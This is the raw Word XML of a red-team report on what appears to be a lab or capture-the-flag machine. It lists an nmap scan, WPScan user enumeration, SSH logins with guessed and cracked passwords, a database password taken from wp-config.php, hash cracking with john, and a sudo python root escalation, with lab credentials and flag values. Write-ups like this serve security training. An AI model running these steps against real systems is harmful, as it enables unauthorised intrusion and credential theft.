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A8BFB" w14:textId="77777777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># Red Team: Summary of Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31657038" w14:textId="77777777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>## Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31657038" w14:textId="77777777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>- Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31657038" w14:textId="77777777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>- Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31657038" w14:textId="77777777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>- Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31657038" w14:textId="77777777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>### Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31657038" w14:textId="77777777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>Nmap scan results for each machine reveal the below services and OS details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31657038" w14:textId="77777777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>$ nmap -sX 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31657038" w14:textId="77777777" w:rsidR="00A20BED" w:rsidRDefault="00A20BED" w:rsidP="00E8782E">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF0DA03" w14:textId="13686A6F" w:rsidR="00000000" w:rsidRPr="00E8782E" w:rsidRDefault="00A20BED" w:rsidP="00E8782E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Results:</w:t>
      </w:r>
      <w:r w:rsidR="00336E68" w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  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>Target 1: 192.168.1.110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>- Ports open (22, 80, 111, 139, 445)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF0DA03" w14:textId="13686A6F" w:rsidR="00000000" w:rsidRPr="00E8782E" w:rsidRDefault="00A20BED" w:rsidP="00E8782E">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24F14262" wp14:editId="5653E0EB">
            <wp:extent cx="3409950" cy="30003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300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>```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>This scan identifies the services below as potential points of entry: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>- Target 1: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- Port 22 Open SSH</w:t>
      </w:r>
      <w:r w:rsidR="00A20BED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>, CVE-2002-1715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- Port 80 open web port</w:t>
      </w:r>
      <w:r w:rsidR="00A20BED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>, CVE</w:t>
      </w:r>
      <w:r w:rsidR="00953D89">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-2019-6579</w:t>
      </w:r>
      <w:r w:rsidR="00A20BED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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- Port 111 Open r</w:t>
      </w:r>
      <w:r w:rsidR="00A20BED">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>pc</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>bind. Can be used to map othe</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>r services runnining on other ports.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- Port 139 NetBIOS.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- Port 445 SMB port. Used for interprocess communication (i.e., filesharing, etc.)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>The following vulnerabilities were identified on each target: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>- Target 1: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - User enumeration on Wordpress we</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>bsite.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- Weak user credentials.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- Unsalted password hash.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- Misconfigured access controls.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>### Exploitation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>The Red Team was able to penetrate `Target 1` and retr</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ieve the following confidential data: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>- Target 1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- `flag1.txt`: </w:t>
      </w:r>
      <w:r w:rsidR="00953D89" w:rsidRPr="00953D89">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>b9bbcb33e11b80be759c4e844862482d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  - **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF0DA03" w14:textId="13686A6F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    - </w:t>
      </w:r>
      <w:r w:rsidR="00953D89">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>A list of users were enumerated using the WPSCAN on WordPress website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF0DA03" w14:textId="13686A6F" w:rsidR="00732273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    - </w:t>
      </w:r>
      <w:r w:rsidR="00732273">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A2660" w14:textId="7FA4FEC4" w:rsidR="00000000" w:rsidRDefault="00732273" w:rsidP="00732273">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:ind w:left="72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 </w:t>
      </w:r>
      <w:r w:rsidR="00953D89">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan –url </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00953D89" w:rsidRPr="00CD3CB3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          </w:rPr>
          <w:t>http://192.168.1.110/wordpress</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00953D89">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> --enumerate -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BEDF2F" w14:textId="5929478E" w:rsidR="00953D89" w:rsidRDefault="00953D89" w:rsidP="00E8782E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732273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- ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00CD3CB3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          </w:rPr>
          <w:t>michael@192.168.1.110</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="497AB752" w14:textId="1FAB0335" w:rsidR="00953D89" w:rsidRDefault="00953D89" w:rsidP="00E8782E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732273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- password: Michael – obtained through guessing password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD0B25" w14:textId="7B72D192" w:rsidR="00953D89" w:rsidRDefault="00953D89" w:rsidP="00E8782E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- Flag 1 located in service.html under html folder </w:t>
      </w:r>
      <w:r w:rsidR="00732273">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>as root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDEB80F" w14:textId="137484B9" w:rsidR="00336E68" w:rsidRPr="00E8782E" w:rsidRDefault="00336E68" w:rsidP="00E8782E">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="578F562F" wp14:editId="31CFFEF3">
            <wp:extent cx="4714875" cy="30384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DEB80F" w14:textId="137484B9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- `flag2.txt`:</w:t>
      </w:r>
      <w:r w:rsidR="00953D89">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00953D89" w:rsidRPr="00953D89">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fc3fd58dcdad9ab23faca6e9a36e581c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDEB80F" w14:textId="137484B9" w:rsidR="00000000" w:rsidRPr="00E8782E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  - **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDEB80F" w14:textId="137484B9" w:rsidR="00000000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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00732273">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Flag 2 located under web folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D98D5" w14:textId="567735BA" w:rsidR="00732273" w:rsidRPr="00E8782E" w:rsidRDefault="00732273" w:rsidP="00E8782E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- Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D98D5" w14:textId="567735BA" w:rsidR="00732273" w:rsidRDefault="00336E68" w:rsidP="00E8782E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    </w:t>
      </w:r>
      <w:r w:rsidR="00732273">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00732273">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cd ../</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A014A6E" w14:textId="36550CFE" w:rsidR="00732273" w:rsidRDefault="00732273" w:rsidP="00E8782E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- ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E913C71" w14:textId="78147BE1" w:rsidR="00732273" w:rsidRDefault="00732273" w:rsidP="00E8782E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- cat flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E15C4D" w14:textId="5D4B7407" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00E8782E">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51792A42" wp14:editId="1FCA91EB">
            <wp:extent cx="4752975" cy="101323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774" cy="102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15DFE" w14:textId="34B73E79" w:rsidR="00732273" w:rsidRPr="00E8782E" w:rsidRDefault="00732273" w:rsidP="00732273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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - `flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.txt`:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00732273">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>afc01ab56b50591e7dccf93122770cd2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E15DFE" w14:textId="34B73E79" w:rsidR="00732273" w:rsidRPr="00E8782E" w:rsidRDefault="00732273" w:rsidP="00732273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  - **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E15DFE" w14:textId="34B73E79" w:rsidR="00732273" w:rsidRPr="00E8782E" w:rsidRDefault="00732273" w:rsidP="00732273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    - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>3</w:t>
      </w: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located in mysql word press database under wp_posts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E15DFE" w14:textId="34B73E79" w:rsidR="00732273" w:rsidRDefault="00732273" w:rsidP="00732273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    - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>password for Michael to access database was found in the wp-config.php file under the wordpress folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDF94D8" w14:textId="3B204DFF" w:rsidR="00732273" w:rsidRDefault="00732273" w:rsidP="0073227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- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>SQL Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755DE574" w14:textId="73772986" w:rsidR="00732273" w:rsidRDefault="00732273" w:rsidP="0073227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-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> To access SQL DB: mysql -u root -p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D80E3A1" w14:textId="77777777" w:rsidR="00732273" w:rsidRDefault="00732273" w:rsidP="00E8782E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- password: R@v3nSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7F52C1" w14:textId="77777777" w:rsidR="00732273" w:rsidRDefault="00732273" w:rsidP="00E8782E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- </w:t>
      </w:r>
      <w:r w:rsidR="00336E68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2896A755" w14:textId="77777777" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00E8782E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- use wordpress;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369E2CF7" w14:textId="77777777" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00E8782E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- show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2FC556" w14:textId="77777777" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00E8782E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- select * from wp_posts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB26AA1" w14:textId="394CB30C" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00E8782E">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00336E68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>- Note: Password hashes will be found under wp_users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7DA28F" w14:textId="66635EE1" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00E8782E">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2046C3F0" wp14:editId="6ED7C311">
            <wp:extent cx="4924425" cy="8096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5A144" w14:textId="108E7E92" w:rsidR="00336E68" w:rsidRPr="00E8782E" w:rsidRDefault="00336E68" w:rsidP="00336E68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>- `flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.txt`:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00336E68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>715dea6c055b9fe3337544932f2941ce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A85A144" w14:textId="108E7E92" w:rsidR="00336E68" w:rsidRPr="00E8782E" w:rsidRDefault="00336E68" w:rsidP="00336E68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  - **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A85A144" w14:textId="108E7E92" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00336E68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   - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>4</w:t>
      </w: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was located by cracking the password hashes, remote shell access into steven’s machine and escalating privileges to root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459A5306" w14:textId="2219916F" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00336E6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- Obtain password hashes from SQL database, copy to Kali machine and save as a text file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53888239" w14:textId="259ED5A6" w:rsidR="00336E68" w:rsidRPr="00E8782E" w:rsidRDefault="00336E68" w:rsidP="00336E6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- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Password Cracking &amp; SSH Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53888239" w14:textId="259ED5A6" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00336E68">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E8782E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>john wp_hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F89A5A" w14:textId="6D076D25" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00336E6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- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ssh steven@192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4639C5" w14:textId="3DFD7981" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00336E6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- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>password: pink84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402B2367" w14:textId="78CC0C4F" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00336E6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- sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47012ABC" w14:textId="383FBFC5" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00336E6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- sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ACB838" w14:textId="2733A54B" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00336E6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- cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BD9BF" w14:textId="77777777" w:rsidR="00336E68" w:rsidRDefault="00336E68" w:rsidP="00E8782E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- ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00336E68" w:rsidRPr="00336E68" w:rsidRDefault="00336E68" w:rsidP="00E8782E">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FF15AC9" wp14:editId="65E6D794">
            <wp:extent cx="3952875" cy="3009697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798" cy="3015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36E68" w:rsidRPr="00336E68" w:rsidSect="00E8782E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MLGwsDQ3MjIxNjNR0lEKTi0uzszPAykwrAUAGks/lywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00B66A57"/>
    <w:rsid w:val="00336E68"/>
    <w:rsid w:val="00732273"/>
    <w:rsid w:val="00953D89"/>
    <w:rsid w:val="00A20BED"/>
    <w:rsid w:val="00B66A57"/>
    <w:rsid w:val="00E87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27E84"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{85CE76C6-3058-4F9F-88BE-4E2769D76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E8782E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8782E"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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953D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3D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ichael@192.168.1.110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192.168.1.110/wordpress" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png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i Eleie</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Abdi Eleie</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-05T17:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-05T17:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>